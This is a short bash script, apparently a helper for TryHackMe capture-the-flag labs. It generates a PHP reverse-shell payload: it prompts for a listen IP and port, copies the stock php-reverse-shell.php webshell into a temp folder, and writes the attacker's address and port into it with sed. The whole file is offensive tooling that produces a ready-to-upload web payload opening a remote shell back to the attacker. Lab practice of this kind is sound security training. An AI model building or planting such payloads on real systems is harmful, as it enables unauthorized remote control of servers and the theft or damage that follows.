#!/bin/bash

# Prompt for values
echo "Your IP address is:"; cat /tmp/thmip.txt
read -p "Listen address? (Leave blank to use your IP listed above) " valueA
read -p "Listen port? " valueB

# Use the IP from the file if valueA is left blank
if [ -z "$valueA" ]; then
  valueA=$(cat /tmp/thmip.txt)
fi

# Generate temp dir
mkdir /tmp/Rshells/Payloads
cp /usr/share/webshells/php/php-reverse-shell.php /tmp/Rshells/Payloads/rshell.php

# Use sed to replace placeholders in the file
sed -i "s/PUT_THM_ATTACKBOX_IP_HERE/${valueA}/" /tmp/Rshells/Payloads/rshell.php
sed -i "s/1234/${valueB}/" /tmp/Rshells/Payloads/rshell.php

# Finished output
echo "Your payload has been created:"
echo "/tmp/Rshells/Payloads/rshell.php"
